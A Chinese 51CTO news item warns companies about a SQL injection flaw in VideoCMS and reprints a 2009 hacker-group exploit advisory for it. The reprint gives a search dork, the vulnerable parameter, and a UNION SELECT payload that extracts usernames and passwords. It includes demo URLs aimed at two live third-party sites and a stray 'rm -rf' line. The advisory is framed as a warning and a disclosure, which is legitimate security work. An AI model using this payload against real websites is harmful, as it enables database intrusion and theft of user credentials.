51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

VideoCMS存在SQL注入漏洞 使用此CMS的公司请做防范

原创
作者:鲜橙加冰
安全
VideoCMS存在SQL injection漏洞,使用此CMS的企业请做防范。

【51CTO.com综合消息】VideoCMS存在SQL injection漏洞,使用此CMS的公司请做防范。以下是51CTO编辑找到的测试代码,仅做测试,请勿用于非法用途。

[~] VideoCMS SQL injection vulnerability - (id)                                   #

[~] Author : kaMtiEz (kamzcrew@gmail.com)                                    #

[~] Homepage : http://www.indonesiancoder.com                                  #

[~] Date : Desember 14, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.codemight.com/
[+] Download : -
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno           
[+] Location : INDONESIA - JOGJA
[+] description http://www.codemight.com/index.php?m=product&p=1

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]

[ Exploit ]

/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

[ Demo ]

http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] segelas vodka menemaniku setiap malam .. :P
[+] Dengerin Radio yach di http://antisecradio.fm ok coy ?

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

【编辑推荐】

  1. Oracle数据库内部安全威胁:严重性
  2. 专题:网站常见的攻击与防御
  3. 卡巴斯基发布2010年网络威胁六项预测
  4. Web应用防火墙是如何为客户提供防护的
  5. 选择硬件防火墙时你应注意的十件事
  6. 深入理解防火墙 有效屏蔽外界的攻击
  7. 防火墙功能分类及其局限性介绍分析
责任编辑:王文文 来源: 51CTO.com
SQL injectionVideoCMS
相关推荐
PHP代码网站如何防范SQL注入漏洞攻击建议
本文作者通过PHP和MySQL数据库为例,分享一下SQL注入攻击和一些简单的防范措施和一些如何避免SQL注入攻击的建议。

2012-12-19 10:36:06

注入漏洞防范 iBatis like查询需注意
《iBatisinaction》书里面里面提到使用iBatislike查询的时候,会有注入漏洞,本文作者根据实践重复注入漏洞过程,详情请见下文。

2009-07-20 15:37:09

iBatis like注入漏洞
对JSP防范SQL注入攻击描述
此文章主要向大家讲述的是于JSP防范SQL注入攻击,以及对其在实际操作中所涉及到的SQL注入攻击的总体思路等内容的讲述。

2010-09-08 13:31:24

防止SQL注入漏洞方法
SQL注入漏洞可谓是“千里之堤,溃于蚁穴”,下面教您一个防止SQL注入漏洞的方法,希望对您学习SQL数据库防注入方面有所帮助。

2010-10-22 15:18:18

SQL注入漏洞
详解PHP防范SQL注入具体方法
PHP防范SQL注入是一个非常重要的安全手段。相信大家对这一安全防范方法还不是很了解,希望通过本文介绍的内容大家能够充分掌握这一知识点。

2009-12-03 18:23:23

齐博CMSSQL注入威胁 安全宝首推解决方案
近日,齐博CMS建站系统存在SQL注入漏洞,黑客可利用此漏洞入侵网站服务器,窃取机密数据甚至导致数据库变为傀儡主机,企业网站被入侵。目前针对SQL注入漏洞创新工场旗下网站安全宝凭借独创的云WAF防护技术,率先在业内推出安全解决方案,领先一步保护了网站安全。

2013-01-14 11:26:27

BigACE username参数SQL注入漏洞
SQL注入远程攻击立即处理[msg]影响版本:KevinPapstBigACE2.5漏洞描述:BUGTRAQID:34920BIGACE是免费的Web内容管理系统,可帮助创建和管理网站。

2009-11-02 13:47:09

phpMyAdmin SQL书签HTML注入漏洞
注入漏洞远程攻击立即处理[msg]影响版本:phpMyAdmin3.x漏洞描述:BUGTRAQID:35543CVE(CAN)ID:CVE20092284phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL

2009-10-25 13:32:09

如何避免出现SQL注入漏洞
本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。

2021-09-16 09:05:45

SQL注入漏洞网络攻击
AirLive IP监控相机存在命令注入漏洞
OvisLink公司制造的大量AirLiveIP监控摄像机中都存在着命令注入漏洞,通过该漏洞,网络攻击者可以解码用户登录凭证,并可以完全控制监控设备。

2015-07-09 14:36:12

ProFTPD字符编码SQL注入漏洞
SQL注入远程攻击立即处理[msg]ProFTPD是一款开放源代码FTP服务程序。ProFTPD在执行SQL查询之前没有正确地设置字符编码,攻击者可以在向服务器提交的SQL命令中内嵌无效编码的多字节字符,以绕过标准字符转义方式在服务器上执行恶意命令。成功攻击要求启用了NLS支持。

2009-02-12 10:14:16

SQL注入漏洞检测及防御方法
SQL注入(SQLInjection)是一种广泛存在于Web应用程序中的严重安全漏洞,它允许攻击者在不得到授权的情况下访问、修改或删除数据库中的数据。这是一种常见的攻击方式,因此数据库开发者、Web开发者和安全专业人员需要了解它,以采取措施来预防和检测SQL注入漏洞。

2023-12-01 16:21:42

关于SQL注入漏洞4个误解
SQL注入已是一个老生常谈的话题,但时至今日仍是我们作为开发人员和数据库专业人员所面临的最大安全风险之一。本文我将着重说明人们对SQL注入常见的四个误解。安全无小事,任何人都不应对此抱有任何的幻想!

2018-03-29 10:16:04

如何使用加密Payload来识别并利用SQL注入漏洞
在这篇文章中,安全教育培训专家SunilYadav将会讨论一个案例,并介绍如何通过一个加密的Payload来发现并利用SQL注入漏洞。

2017-05-02 09:02:14

Golang是如何防范 SQL注入、CSRF、XSS攻击
为了防止XSS攻击,确保所有用户输入在输出到网页时都经过适当的转义。在Go语言中,使用htmltemplate包可以自动对HTML进行安全处理。

2024-10-12 10:57:21

新手入门:防范SQL注入攻击新办法
以下的文章主要描述的是新手入门之防范SQL注入攻击的好用办法,在实际操作中可能会有会给用户带来不便,以下的文章就是相关破解方案的介绍。

2010-09-08 14:02:46

几招防范Java漏洞
你的企业在使用Java平台吗?你可知道,Java平台很有可能会为病毒、木马大开方便之门。就如何防范最新的Java平台漏洞这一话题,本文为读者提供了一些参考方案。

2012-11-16 11:50:11

知名 Node.js 组件存在代码注入漏洞
日前,一个被大量下载的Node.js组件被发现其含有一个高危的代码注入漏洞。该漏洞被追踪为CVE202121315,影响了「systeminformation」npm组件的安全性,该组件每周的下载量约为80万次,自诞生以来,至今已获得近3400万次下载。

2021-02-26 13:18:38

Node.js漏洞代码
SQL注入漏洞是IT安全阿喀琉斯之踵
五名嫌犯日前被指控利用SQL注入攻击侵入美国几家公司的网络系统,盗取了3亿美元。这起大宗国际黑客犯罪事件,也反映出SQL漏洞仍是IT运营的致命弱点。

2013-07-27 14:14:25

安卓adb备份存在漏洞注入恶意APK
Android在系统备份后还原的处理上存在严重漏洞(CVE20147952),该漏洞是由Android的命令行工具adb的问题导致的,影响目前所有版本的安卓系统(包括AndroidL)。目前该漏洞没有修复。

2015-07-13 09:21:27

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服